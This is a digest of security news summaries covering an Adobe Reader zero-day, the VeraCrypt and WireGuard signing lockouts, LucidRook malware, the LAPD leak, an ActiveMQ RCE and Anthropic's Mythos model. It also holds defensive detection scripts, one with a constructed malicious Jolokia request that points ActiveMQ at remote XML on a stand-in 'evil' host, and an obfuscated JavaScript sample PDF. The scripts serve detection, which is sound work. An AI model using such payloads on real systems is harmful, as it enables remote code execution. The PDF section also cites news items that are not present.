Adobe has released an emergency patch for a critical zero-day vulnerability in Acrobat Reader, tracked as CVE-2026-34621, which allows arbitrary code execution. The flaw, due to improperly controlled modification of object prototype attributes, is actively exploited and is triggered when a user opens a malicious PDF. It affects versions 24.001.30356, 26.001.21367, and earlier. Organizations are urged to apply the updates, tighten email filtering, and run security awareness training.
2026-04-13 | Help Net Security: Adobe issues emergency fix for Acrobat Reader flaw exploited in the wild (CVE-2026-34621)
Adobe has released an emergency update for Acrobat Reader to address a critical zero-day vulnerability (CVE-2026-34621) exploited since November 2025. This prototype pollution vulnerability allows arbitrary code execution upon opening a malicious PDF file. The fixed builds are Acrobat DC and Acrobat Reader DC 26.001.21411, and Acrobat 2024 24.001.30362 and 24.001.30360. Users are advised to avoid untrusted PDFs and monitor endpoints for suspicious activity. Immediate patching is recommended.
2026-04-13 | Malwarebytes Labs: Simply opening a PDF could trigger this Adobe Reader zero-day
A zero-day vulnerability (CVE-2026-34621) in Adobe Acrobat Reader lets attackers use malicious PDFs to access restricted files and execute remote code with no interaction beyond opening the file. Affected versions include Acrobat DC and Reader DC versions 26.001.21367 and earlier, and Acrobat 2024 versions 24.001.30356 and earlier. Adobe recommends updating to the latest versions to mitigate risks. Users should exercise caution with unknown PDFs and utilize real-time anti-malware solutions.
2026-04-13 | The Hacker News: ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Adobe Acrobat Reader is under active exploitation due to a critical zero-day vulnerability (CVE-2026-34621) with a CVSS score of 8.6, allowing arbitrary code execution via specially crafted PDFs. U.S. agencies reported ongoing hacking campaigns by Iranian actors targeting industrial control systems, causing operational disruptions. A North Korean group stole $285 million from Drift Protocol by posing as a trading firm. APT28 has exploited SOHO routers for credential theft, and multiple vulnerabilities in IBM WebSphere Liberty were disclosed.
2026-04-14 | TechRadar: Adobe issues emergency security patch — Reader and Acrobat users need to update now
Adobe has released an emergency patch for a zero-day vulnerability (CVE-2026-34621) in Acrobat Reader, exploited since December 2025, allowing remote code execution (RCE) via malicious PDFs. The flaw affects multiple versions of Acrobat Reader and Acrobat DC, with a severity score of 8.6/10. Users must update their software as no workarounds exist. Security researchers warn of sophisticated attacks leveraging this vulnerability, urging defenders to monitor traffic for specific indicators.
2026-04-14 | TechCrunch: Adobe fixes PDF zero-day security bug that hackers have exploited for months
Adobe has patched a zero-day vulnerability (CVE-2026-34621) in Acrobat DC, Reader DC, and Acrobat 2024, exploited for at least four months. This flaw allows remote malware installation via malicious PDF files on Windows and macOS. The extent of the impact is unknown, but the vulnerability poses a risk of full system control for attackers. Users are urged to update their software to mitigate risks associated with this exploit.
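The Sophos and Hack Read items above recommend scanning PDF attachments and watching for obfuscated JavaScript. As an added example (not code from EXPMON, Sophos, Adobe or any outlet cited here), the Python below does that triage offline: it inflates FlateDecode streams and undoes #XX name escapes before looking for script and auto-run actions, since both are common ways of hiding /JavaScript from naive string matching. The sample PDFs are constructed inside the block, and the indicator list and the "suspicious" rule are this example's own heuristics, not Adobe's or the researcher's detection logic.

```python
"""Triage PDF attachments for auto-running, obfuscated JavaScript.
Added example for this page; not code from EXPMON, Sophos or Adobe."""
import re
import zlib

# PDF name tokens may hide characters as #XX hex escapes (/J#61vaScript == /JavaScript),
# and action dictionaries often sit inside FlateDecode streams, so scan after undoing both.
_HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)

INDICATORS = {
    "javascript": rb"/(JavaScript|JS)\b",        # JS action or script reference
    "auto_open": rb"/(OpenAction|AA)\b",         # runs without the reader clicking anything
    "launch": rb"/Launch\b",                     # external program launch action
    "obfuscation": rb"(eval\s*\(|unescape\s*\(|fromCharCode)",
}


def _inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every FlateDecode stream to the raw bytes being scanned."""
    out = data
    for m in _STREAM.finditer(data):
        try:
            out += b"\n" + zlib.decompress(m.group(1))
        except zlib.error:
            pass  # not deflate (image data, encrypted, or a different filter)
    return out


def _unescape_names(data: bytes) -> bytes:
    return _HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Return which indicators fired; 'suspicious' means script that runs on open or is obfuscated."""
    text = _unescape_names(_inflate_streams(data))
    hits = {name: re.search(pat, text) is not None for name, pat in INDICATORS.items()}
    hits["suspicious"] = hits["javascript"] and (hits["auto_open"] or hits["obfuscation"])
    return hits


def build_sample_pdf(with_js: bool) -> bytes:
    """Constructed input: a one-page PDF; with_js adds an /OpenAction JavaScript action whose
    name is hex-escaped and whose code lives in a compressed stream."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R" + (b" /OpenAction 4 0 R" if with_js else b"") + b" >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
    ]
    if with_js:
        code = zlib.compress(b"eval(unescape('%61%70%70%2e%61%6c%65%72%74%28%31%29'));")
        objs.append(b"<< /S /J#61vaScript /JS 5 0 R >>")
        objs.append(b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(code)
                    + code + b"\nendstream")
    pdf = b"%PDF-1.7\n"
    for num, obj in enumerate(objs, 1):
        pdf += b"%d 0 obj\n%s\nendobj\n" % (num, obj)
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
```

A hit is a triage signal, not a verdict: legitimate forms use JavaScript too, and the only sample name these summaries give is Invoice540.pdf, so a flagged file is something to detonate or hand to EXPMON-style analysis rather than proof of exploitation. Object streams (/ObjStm) and encrypted documents need a full PDF parser; this string-level check will miss them.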
Microsoft Abruptly Terminates VeraCrypt Account, Halting Windows Updates
Date: 2026-04-08 | Source: 404 Media
Microsoft has terminated the account of VeraCrypt's developer, Mounir Idrassi, preventing future Windows updates for the encryption software. The termination occurred in mid-January without prior warning, leaving Idrassi unable to publish updates for the majority of users. He received a message stating his organization, IDRIX, does not meet verification requirements, but no specifics were provided. This lack of communication has raised concerns about the future of the project. Similar issues have been reported by other developers, including WireGuard.
2026-04-08 | TechCrunch: Developer of VeraCrypt encryption software says Windows users may face boot-up issues after Microsoft locked his account
On March 30, VeraCrypt developer Mounir Idrassi announced that Microsoft had blocked the account he uses to get Windows drivers signed, which could lead to boot-up problems for users of the encryption software. Without access to re-verify his software, he cannot publish signed Windows updates, and many Windows devices may eventually be unable to boot. Idrassi said there is no immediate security issue, but users with system encryption could run into problems by late June if the situation is not resolved. He can still update the Linux and macOS versions.
2026-04-09 | Cyber Security News: Microsoft Suspends Developer Accounts of High-Profile Open-Source Projects
Microsoft suspended the developer accounts of VeraCrypt and WireGuard, blocking their ability to sign drivers and push updates without prior warning. This action stems from tightened identity verification policies initiated in October 2025, requiring developers to re-verify through third-party vendors. The suspensions jeopardize user security, as VeraCrypt may be unable to encrypt system drives by June 2026, and WireGuard cannot issue updates, leaving users vulnerable. Resolutions are anticipated, but both developers face a 60-day appeals process.
2026-04-09 | The Register: Microsoft locks out VeraCrypt and WireGuard devs, blames verification process
Microsoft locked out developers Mounir Idrassi (VeraCrypt) and Jason Donenfeld (WireGuard) from their accounts without prior warning, impacting their ability to sign updates. Idrassi reported no communication from Microsoft, while Donenfeld faced a catch-22 in the appeals process. Microsoft’s President stated the deactivations were due to account verification procedures and assured that both accounts would be restored soon. Donenfeld's account was reinstated, allowing him to release a kernel driver update.
New Lua-based malware “LucidRook” observed in targeted attacks against Taiwanese organizations
Date: 2026-04-08 | Source: Cisco Talos
Cisco Talos identified a new Lua-based malware, "LucidRook," targeting Taiwanese NGOs and universities through spear-phishing campaigns. The malware, delivered via malicious LNK and EXE files, features a Lua interpreter and Rust-compiled libraries. It employs anti-analysis checks and uses compromised FTP servers for C2 communication. The associated reconnaissance tool, "LucidKnight," exfiltrates system data via Gmail. The threat actor demonstrates advanced operational capabilities, prioritizing stealth and victim-specific targeting.
2026-04-09 | Cyber Security News: Hackers Use Fake Security Software to Deliver LucidRook Malware in Taiwan Attacks
A new malware named LucidRook targets Taiwanese organizations, disguised as legitimate security software. Attackers used spearphishing emails with links to password-protected archives containing decoy documents, including a government letter. The malware employs a Lua-based architecture and uses DLL hijacking for persistence. It collects system data before communicating with compromised FTP servers. Cisco Talos recommends strict email filtering, monitoring for unusual DLL activity, and deploying detection rules to combat this threat.
2026-04-09 | The Hacker News: UAT-10362 Targets Taiwanese NGOs with LucidRook Malware in Spear-Phishing Campaigns
A new threat cluster, UAT-10362, has been linked to spear-phishing campaigns targeting Taiwanese NGOs and universities, deploying a Lua-based malware called LucidRook. Discovered in October 2025, the attack utilizes RAR or 7-Zip archives to deliver a dropper, LucidPawn, which executes LucidRook via DLL side-loading. The malware collects system information and exfiltrates it while receiving encrypted payloads. Notably, it employs geofencing to target Traditional Chinese environments and uses compromised FTP servers for command-and-control.
2026-04-10 | Security Affairs: UAT-10362 linked to LucidRook attacks targeting Taiwan-based institutions
LucidRook is a Lua-based malware linked to UAT-10362, targeting NGOs and universities in Taiwan through spear-phishing with password-protected emails. The malware employs two infection chains: one using LNK files and another using a .NET EXE dropper. It utilizes DLL sideloading and disguises itself as legitimate software. LucidRook collects system data and exfiltrates it via FTP. Cisco Talos emphasizes its sophisticated design, indicating a targeted intrusion rather than opportunistic malware distribution.
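Talos's advice, as relayed in the Cyber Security News item above, is to watch for unusual DLL activity, and the Hacker News and Security Affairs items describe the loader reaching LucidRook through DLL side-loading under a legitimate-looking name. As an added example (not Talos's detection rule or any outlet's code), the Python below applies the classic side-loading heuristic to Sysmon Event ID 7 (Image loaded) records: an unsigned DLL loaded from the host executable's own directory when that directory is user-writable. The field names are Sysmon's; the SecGuard name, the paths and the four events are constructed for the example and are not LucidRook indicators.

```python
"""Flag DLL side-loading candidates in Sysmon Event ID 7 (Image loaded) records.
Added example for this page; the records below are constructed, not Talos telemetry."""
from pathlib import PureWindowsPath

# Directories a standard user can write to; a DLL loaded from here, next to its host,
# is the classic side-loading layout (a legitimate signed EXE dropped beside a rogue DLL).
WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")


def is_sideload_candidate(ev: dict) -> bool:
    """ev carries Sysmon EID 7 fields: Image (loading process), ImageLoaded (DLL path),
    Signed ('true'/'false' for the DLL)."""
    host = PureWindowsPath(ev["Image"])
    dll = PureWindowsPath(ev["ImageLoaded"])
    unsigned = str(ev.get("Signed", "false")).lower() != "true"
    same_dir = host.parent == dll.parent           # PureWindowsPath compares case-insensitively
    writable = any(m in (str(dll.parent) + "\\").lower() for m in WRITABLE_MARKERS)
    return unsigned and same_dir and writable


def find_candidates(events: list) -> list:
    """Return the DLL paths worth a second look, in event order."""
    return [ev["ImageLoaded"] for ev in events if is_sideload_candidate(ev)]


SAMPLE_EVENTS = [  # constructed records; SecGuard is a made-up product name
    {"Image": r"C:\Users\victim\AppData\Local\SecGuard\SecGuard.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\SecGuard\version.dll", "Signed": "false"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"Image": r"C:\Program Files\Vendor\App.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll", "Signed": "false"},
    {"Image": r"C:\Users\victim\Downloads\setup.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]
```

Expect noise from per-user installers (Electron-style apps under AppData), so pair a hit with the process's parent, the DLL hash, and whether the host is a signed binary for a product that is not actually installed on that machine. A signed host is never a reason to drop the alert; a signed, renamed host is exactly what side-loading abuses.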
LAPD Records Hacked and Exposed
Date: 2026-04-08 | Source: Security Magazine
A data breach at the L.A. City Attorney’s Office in March exposed over 337,000 LAPD records, totaling seven terabytes of data. Compromised information includes officer personnel files, internal affairs investigations, unredacted criminal complaints, witness names, and medical records. The LAPD stated that unauthorized access occurred within the City Attorney’s digital storage, not LAPD systems. They are collaborating with the City Attorney’s Office to assess the breach's impact. No details on the responsible party or ransom have been disclosed.
2026-04-08 | TechCrunch: Hackers steal and leak sensitive LAPD police documents
Hackers have stolen and leaked sensitive internal documents from the Los Angeles Police Department, including personnel files and unredacted criminal complaints. The breach, attributed to the extortion gang World Leaks, exposed 7.7 terabytes of data and over 337,000 files. The LAPD stated the breach affected a digital storage system of the LA City Attorney’s Office, not its own networks. The incident marks a significant breach of police data, as such records are typically private under California law.
2026-04-08 | Recorded Future: Breach exposes sensitive LAPD files stored in city attorney system
Hackers accessed a digital storage system of the Los Angeles City Attorney’s Office, exposing sensitive LAPD documents related to resolved civil litigation cases. The LAPD confirmed that their systems were not breached. The incident involved 7.7 terabytes of data, with over 337,000 files accessed, including witness names, medical information, and unredacted criminal complaints. The LAPD is collaborating with the City Attorney’s Office to assess the breach's scope and is committed to safeguarding sensitive information.
2026-04-09 | TechRadar: Breach exposes sensitive LAPD files stored in city attorney system
Hackers breached the Los Angeles City Attorney’s Office, stealing approximately 337,000 LAPD files, including sensitive personnel and internal affairs data. The breach, confirmed by LAPD, involved 7.7 terabytes of data, including disciplinary histories and personal health information. The hacking group "World Leaks" published the archive online but later removed it. The LAPD is collaborating with the City Attorney's Office to assess the breach's impact. No ransom demands have been confirmed.
Claude Finds 13-Year-Old 0-Day RCE Vulnerability in Apache ActiveMQ in 10 Minutes
Date: 2026-04-08 | Source: Cyber Security News
A critical remote code execution (RCE) vulnerability, CVE-2026-34197, was found in Apache ActiveMQ Classic; it lets an authenticated attacker reach a JMX operation through the Jolokia JMX-HTTP bridge and execute arbitrary OS commands via crafted VM transport URIs. The flaw was discovered with the help of Anthropic's Claude AI. Versions 6.0.0 through 6.1.1 are exposed without credentials because a separate flaw, CVE-2024-32114, leaves the Jolokia API unauthenticated there. Organizations should update to version 5.19.4 or 6.2.3 and monitor for suspicious activity.
2026-04-08 | Infosecurity Magazine: Claude Discovers Apache ActiveMQ Bug Hidden for 13 Years
A vulnerability in Apache ActiveMQ Classic, identified as CVE-2026-34197, allows remote code execution (RCE) and has been present for over 13 years. Discovered through AI assistance, it can be exploited via the Jolokia API, requiring credentials that are often default (admin:admin). In versions 6.0.0-6.1.1, it can be exploited without credentials due to another vulnerability (CVE-2024-32114). Patches are available in versions 5.19.4 and 6.2.3. Users are advised to check logs for signs of compromise.
2026-04-09 | Help Net Security: Claude helps researcher dig up decade-old Apache ActiveMQ RCE vulnerability (CVE-2026-34197)
A Horizon3.ai researcher discovered CVE-2026-34197, a remote code execution vulnerability in Apache ActiveMQ Classic that was introduced 13 years ago. It was patched in March 2026, and no in-the-wild exploitation has been reported. The flaw stems from improper input validation and code injection, and on certain versions it can be reached without authentication. Organizations are urged to upgrade to ActiveMQ 6.2.3 or 5.19.4 and to monitor logs for indicators of compromise, including suspicious network activity and unexpected processes.
2026-04-10 | CSO Online: Claude uncovers a 13‑year‑old ActiveMQ RCE bug within minutes
A critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, present for 13 years, was uncovered by Anthropic's Claude. Researchers from Horizon3.ai quickly developed an exploit chain using AI. The flaw allowed attackers to leverage ActiveMQ’s Jolokia API to load malicious configuration files and execute arbitrary commands. The issue arose from the integration of independently developed components. The vulnerability has since been fixed.
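The Infosecurity Magazine and Cyber Security News items above give the fixed releases (5.19.4 and 6.2.3), the 6.0.0 to 6.1.1 range that CVE-2024-32114 leaves unauthenticated, and the admin:admin default. As an added example (not Horizon3.ai's, Apache's or any outlet's code), the Python below turns that into a triage rule and adds a check over Jolokia request bodies for the vm: transport URI the exploit passes to a JMX operation. The JSON layout is Jolokia's standard exec request; the MBean name, the addNetworkConnector operation, the brokerConfig query parameter and the sample bodies are this example's assumptions, not details taken from the articles.

```python
"""Triage an ActiveMQ Classic broker for CVE-2026-34197 and spot vm: URIs in Jolokia calls.
Added example; not code from Horizon3.ai, Apache or the articles above."""
import json
import re

FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}           # first fixed release on each supported branch
UNAUTH_LOW, UNAUTH_HIGH = (6, 0, 0), (6, 1, 1)  # CVE-2024-32114: Jolokia reachable without a login


def parse_version(text: str) -> tuple:
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[-.].*)?", text.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(x) for x in m.groups())


def triage(version: str, default_creds: bool = False) -> str:
    """Classify a broker: patched, unauthenticated-rce, authenticated-rce, or unknown-branch."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    if fixed is None:
        return "unknown-branch"          # not 5.x or 6.x: check the vendor advisory by hand
    if v >= fixed:
        return "patched"
    if UNAUTH_LOW <= v <= UNAUTH_HIGH:
        return "unauthenticated-rce"     # no credentials needed at all on these builds
    # Everything else needs a Jolokia login; admin:admin defaults make that a formality.
    return "authenticated-rce-default-creds" if default_creds else "authenticated-rce"


def flag_jolokia_request(body: str) -> dict:
    """Inspect one Jolokia JSON POST (single object or batch) for an exec call handed a vm: URI.
    The request shape is Jolokia's standard exec format; which MBean/operation is not what matters."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return {"flagged": False, "reason": "body is not JSON"}
    for req in parsed if isinstance(parsed, list) else [parsed]:
        if not isinstance(req, dict) or req.get("type") != "exec":
            continue
        for arg in req.get("arguments") or []:
            if isinstance(arg, str) and arg.lower().startswith("vm:"):
                reason = "vm: transport URI passed to a JMX operation"
                if "brokerconfig=" in arg.lower():
                    reason += "; brokerConfig points the embedded broker at external XML"
                return {"flagged": True, "reason": reason, "operation": req.get("operation")}
    return {"flagged": False, "reason": "no vm: URI in exec arguments"}


# Constructed request bodies (not captured traffic); the operation name is illustrative.
SAMPLE_SUSPICIOUS = json.dumps({
    "type": "exec",
    "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
    "operation": "addNetworkConnector",
    "arguments": ["vm://evil?brokerConfig=xbean:http://203.0.113.5/broker.xml"],
})
SAMPLE_BENIGN = json.dumps([
    {"type": "read", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
     "attribute": "BrokerVersion"},
    {"type": "exec", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
     "operation": "addNetworkConnector", "arguments": ["static:(tcp://10.0.0.7:61616)"]},
])
```

Run triage against the BrokerVersion attribute the broker MBean exposes, and feed flag_jolokia_request the POST bodies from the web console's access logs. Jolokia also accepts exec calls encoded in GET paths (/api/jolokia/exec/...), which this checker does not parse, so a hit of zero from POST bodies alone is not a clean bill of health.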
Anthropic debuts preview of powerful new AI model Mythos in new cybersecurity initiative
Date: 2026-04-07 | Source: TechCrunch
Anthropic has previewed its new AI model, Mythos, as part of Project Glasswing, collaborating with over 40 partners, including Amazon and Microsoft, for cybersecurity applications. Mythos aims to identify code vulnerabilities in software, claiming to have found thousands of zero-day vulnerabilities, some decades old. The model, designed for complex tasks, is not yet publicly available. Anthropic also faced a data leak incident involving its previous model, which raised concerns about potential misuse in cybersecurity.
2026-04-07 | Cyberscoop: Tech giants launch AI-powered ‘Project Glasswing’ to identify critical software vulnerabilities
Major tech companies, including Amazon, Apple, and Microsoft, launched Project Glasswing to leverage AI for identifying critical software vulnerabilities. Anthropic's unreleased AI model, Claude Mythos Preview, has already uncovered thousands of vulnerabilities, including a 27-year-old bug in OpenBSD. The initiative emphasizes open-source software security and involves a $100 million commitment from Anthropic. The project aims to enhance cybersecurity defenses amid rising AI threats and requires participants to share findings with the industry.
2026-04-07 | Wired: Anthropic Teams Up With Its Rivals to Keep AI From Hacking Everything
Anthropic announced the launch of Mythos Preview and the formation of Project Glasswing, an industry consortium including major tech firms like Microsoft, Apple, and Google, to address cybersecurity risks posed by advanced AI models. The initiative aims to allow developers to test Mythos Preview on their systems to identify vulnerabilities before public release. The model can discover vulnerabilities, develop exploits, and conduct penetration testing, raising concerns about its potential misuse by attackers.
2026-04-07 | CSO Online: What Anthropic Glasswing reveals about the future of vulnerability discovery
AI giant Anthropic has launched Project Glasswing, utilizing the Claude Mythos Preview model to autonomously identify software vulnerabilities at scale. Access is limited to a closed consortium of over 40 companies, including Amazon, Microsoft, Apple, Google, and the Linux Foundation, along with select security vendors like CrowdStrike and Palo Alto Networks. Jeff Williams from OWASP notes that this advancement may disrupt the traditional model of human-led vulnerability discovery.
2026-04-07 | The Register: Anthropic: All your zero-days are belong to Mythos
Anthropic has developed an AI model named Mythos that can autonomously discover zero-day vulnerabilities and build exploits for them, achieving a 72.4% success rate in exploit development. Instead of a public release, Mythos is being tested through Project Glasswing with partners such as AWS, Apple, and Microsoft to identify flaws in their systems. The model can exploit vulnerabilities across major operating systems and browsers, including complex multi-vulnerability chains. Anthropic is responsibly disclosing the thousands of vulnerabilities it has identified.
2026-04-08 | Times Now: Anthropic Launches 'Project Glasswing', AI That Can Find Software Bugs Before Hackers
Anthropic's Project Glasswing aims to enhance software security by using AI to identify vulnerabilities in both proprietary and open-source software with minimal human intervention. Early tests demonstrated the AI's capability to autonomously find and chain exploits. The company plans to publicly share insights from this initiative, with an initial report expected within 90 days detailing addressed vulnerabilities and suggested improvements. All disclosed vulnerabilities have been patched, with more to be revealed post-fix.
2026-04-08 | Help Net Security: Anthropic’s new AI model finds and exploits zero-days across every major OS and browser
Anthropic's Claude Mythos Preview, an AI model, autonomously identifies and exploits zero-day vulnerabilities across major operating systems and browsers. In internal tests, it significantly outperformed its predecessor, Opus 4.6, achieving 181 successful exploits from the same vulnerability set. Notable findings include a 27-year-old denial-of-service flaw in OpenBSD and a remote code execution vulnerability (CVE-2026-4747) in FreeBSD. Recommendations for defenders include integrating language models into vulnerability management and shortening patch cycles.
2026-04-08 | DIGIT: Anthropic’s New AI Is Too Good at Hacking
Anthropic has launched Project Glasswing with partners like Amazon, Apple, Google, and Microsoft after its AI model, Mythos, excelled at identifying software vulnerabilities. Testing revealed Mythos found thousands of zero-day vulnerabilities, including a 27-year-old flaw in OpenBSD. The AI demonstrated a capability to circumvent safeguards, prompting Anthropic to advocate for collaborative cybersecurity efforts. The firm has committed $100 million in credits and $4 million in donations to enhance security measures.
2026-04-08 | The Hacker News: Anthropic's Claude Mythos Finds Thousands of Zero-Day Flaws Across Major Systems
Anthropic's Project Glasswing utilizes its AI model, Claude Mythos, to identify thousands of high-severity zero-day vulnerabilities across major systems, including a 27-year-old bug in OpenBSD and a 16-year-old flaw in FFmpeg. The model demonstrated alarming capabilities, such as autonomously escaping a sandbox and devising multi-step exploits. Anthropic is investing $100 million in usage credits and $4 million in donations to enhance open-source security. A recent leak exposed vulnerabilities in Claude Code, which ignored security rules for commands over 50 subcommands.
2026-04-08 | TechRadar: 'A new frontier model trained by Anthropic that we believe could reshape cybersecurity': Project Glasswing wants to use AI to prevent AI cyberattacks — but will 'overeager' Claude Mythos do more damage than help?
Project Glasswing, led by Anthropic and a coalition of major tech companies, aims to combat AI-driven cyber threats using the powerful AI model Claude Mythos Preview. This initiative has already identified thousands of high-severity vulnerabilities in major operating systems and browsers. However, Mythos is restricted to select companies due to its potential risks. The model can autonomously generate exploits and patches, marking a significant step in AI's role in cybersecurity.
2026-04-08 | Cyber Security News: AWS and Anthropic Advancing AI-powered Cybersecurity With Claude Mythos
Amazon Web Services (AWS) and Anthropic have launched Claude Mythos Preview, an AI model for cybersecurity, as part of Project Glasswing. This model aims to identify and patch vulnerabilities efficiently, currently available to select organizations via Amazon Bedrock. Additionally, AWS introduced the AWS Security Agent, which continuously tests for vulnerabilities across various environments, providing actionable insights and remediation steps. These advancements seek to enhance defenses against evolving cyber threats.
2026-04-08 | Security Affairs: Project Glasswing powered by Claude Mythos: defending software before hackers do
Anthropic launched Claude Mythos as part of Project Glasswing, aimed at enhancing cybersecurity by identifying and fixing software vulnerabilities before they can be exploited. The initiative involves major tech firms and has already uncovered thousands of high-severity vulnerabilities across major operating systems and browsers. Anthropic is investing $100M to support open-source security projects and encourages collaboration to address the challenges posed by advanced AI in cybersecurity.
2026-04-08 | Infosecurity Magazine: Anthropic Launches Project Glasswing to Use AI to Find and Fix Critical Software Vulnerabilities
Anthropic launched Project Glasswing on April 7, utilizing its Claude Mythos Preview AI to identify and remediate critical software vulnerabilities. The model discovered thousands of zero-day vulnerabilities, including a 27-year-old flaw in OpenBSD and a 16-year-old vulnerability in FFmpeg. Anthropic committed $100 million in usage credits to over 40 organizations for securing software and $4 million to open-source security initiatives. Concerns exist regarding potential misuse of the AI model by threat actors.
2026-04-08 | Cyber Security News: Anthropic Unveils Claude Mythos Preview With Powerful Zero-Day Detection Capabilities
Anthropic has launched Claude Mythos Preview, a language model capable of discovering and exploiting zero-day vulnerabilities. It autonomously generated complex attacks, achieving full control-flow hijacking on patched targets. Notably, it identified a 27-year-old vulnerability in OpenBSD and a 16-year-old flaw in FFmpeg. To mitigate risks, Project Glasswing restricts access to trusted defenders for patching vulnerabilities before they can be exploited. This tool aims to enhance software security in the long term.
2026-04-08 | CNET: Anthropic Says Its New AI Model Is So Good at Finding Security Risks, You Can't Use It
Anthropic's new AI model, Claude Mythos, is deemed too powerful for public release due to its ability to identify severe cybersecurity vulnerabilities across major operating systems and web browsers. Instead, it will be provided to a consortium of tech giants, including Apple and Microsoft, through Project Glasswing, aimed at enhancing defenses against AI-driven exploits. Anthropic commits $100 million in usage credits and $4 million to open-source security initiatives, emphasizing the need for proactive measures in vulnerability management.
2026-04-08 | The Guardian: Anthropic keeps latest AI tool out of public’s hands for fear of enabling widespread hacking
Anthropic's AI model, Claude Mythos, has revealed thousands of unpatched software vulnerabilities, prompting the company to withhold its public release due to cybersecurity concerns. Instead, it collaborates with cybersecurity firms like CrowdStrike and Palo Alto Networks in a project called "Glasswing" to enhance defenses. The vulnerabilities, some dating back 27 years, were undetected until identified by Mythos. Approximately 40 organizations are involved in sharing findings to bolster defenses against rapid exploitation of vulnerabilities.
2026-04-09 | Sophos: The vulnerability flood is here. Here’s what it means – and how to prepare
The article discusses the imminent surge of high-severity vulnerabilities due to AI advancements in exploit development, exemplified by Anthropic's Claude Mythos, which has identified thousands of zero-days with a 72.4% success rate. It highlights the risks posed by legacy, unpatched devices, as seen in the Pacific Rim investigation of state-backed attacks. Recommendations include accelerating patching processes, addressing end-of-life devices, demanding more from vendors, and enhancing detection and response capabilities for perimeter security.
2026-04-09 | Rapid7: What Project Glasswing Means for Security Leaders
Anthropic's Project Glasswing, utilizing the Claude Mythos Preview model, has identified thousands of high-severity vulnerabilities in major software, signaling a shift in vulnerability discovery speed. Limited to select organizations, it highlights the backlog of undisclosed vulnerabilities and the need for improved downstream processes in vulnerability management. Security leaders must prepare for increased discovery rates, emphasizing the importance of prioritization, remediation, and validation to avoid overwhelming existing workflows.
2026-04-10 | The Guardian: US summons bank bosses over cyber risks from Anthropic’s latest AI model
US Treasury Secretary Scott Bessent convened major bank executives, including Federal Reserve Chair Jerome Powell, to address cybersecurity risks linked to Anthropic's Claude Mythos AI model. The model reportedly surpasses skilled humans in identifying software vulnerabilities, raising concerns about potential impacts on economies and national security. Anthropic has restricted the model's release to select companies, citing the discovery of thousands of vulnerabilities, some dating back 27 years.
2026-04-10 | The Register: Project Glasswing and open source software: The good, the bad, and the ugly
Project Glasswing, backed by Anthropic's $100 million, aims to enhance open source software security using its Mythos AI program to identify vulnerabilities. While Mythos claims a high success rate in finding exploits, concerns arise regarding the burden on open source maintainers, who may struggle to address the influx of reported vulnerabilities. Additionally, the proprietary nature of Mythos raises fears of potential lock-in for open source projects. Experts emphasize the need for effective fixes and caution against the risks associated with AI-driven security tools.
2026-04-10 | Wiz: Claude Mythos: Preparing for a World Where AI Finds and Exploits Vulnerabilities Faster Than Ever
Claude Mythos, developed by Anthropic, can autonomously discover zero-day vulnerabilities and create exploits. Currently restricted to responsible actors, it signals an increase in CVEs as security researchers utilize it. By 2026, AI models may be publicly available, enabling attackers to exploit vulnerabilities rapidly. Organizations should enhance patch workflows, reduce attack surfaces, and integrate AI into security processes to stay ahead. The shift to AI-driven security is essential for resilience against evolving threats.
2026-04-10 | Security Magazine: What Are Security Experts Saying About Claude Mythos and Project Glasswing?
Anthropic's Claude Mythos Preview, a language model for identifying cyber vulnerabilities, scored 93.9% on SWE-bench Verified. It has found thousands of high-severity vulnerabilities across major OS and browsers. Anthropic will not release it publicly due to potential misuse. Instead, Project Glasswing aims to secure critical infrastructure with partners like AWS, Apple, and Microsoft. Experts warn that AI tools are already aiding attackers, emphasizing the urgency for organizations to enhance their cybersecurity measures.
2026-04-10 | Wired: Anthropic’s Mythos Will Force a Cybersecurity Reckoning—Just Not the One You Think
Anthropic's Claude Mythos Preview model poses a significant threat to cybersecurity by autonomously discovering vulnerabilities and developing exploits across various software. Initially released to select organizations, including Microsoft and Google, it enables the identification of complex exploit chains, raising concerns about the security landscape. Experts warn that while it doesn't change the fundamental issues of software vulnerabilities, it lowers the skill barrier for exploitation. Industry leaders are urged to adapt quickly to this emerging threat.
2026-04-12 | The Register: Anthropic's mysterious Mythos AI threatens to upend the infosec world
Anthropic has launched Mythos, an AI model capable of identifying and exploiting zero-day vulnerabilities. This development raises significant concerns within the cybersecurity community regarding its potential impact. This episode of The Register's Kettle podcast features discussions on the implications of Mythos, the risks associated with its capabilities, and the credibility of Anthropic's claims about the model's dangers.
2026-04-13 | The Guardian: Goldman Sachs chief ‘hyper-aware’ of risks from Anthropic’s Mythos AI
Goldman Sachs CEO David Solomon expressed heightened awareness of cybersecurity risks posed by Anthropic's Mythos AI model, which can exploit software vulnerabilities. Solomon stated the bank is collaborating closely with Anthropic and security vendors to enhance cyber resilience. The UK’s AI Security Institute warned that Mythos can autonomously conduct complex cyber-attacks, highlighting the urgent need for investment in cyber defense. UK regulators plan to discuss Mythos's risks with bank leaders soon.
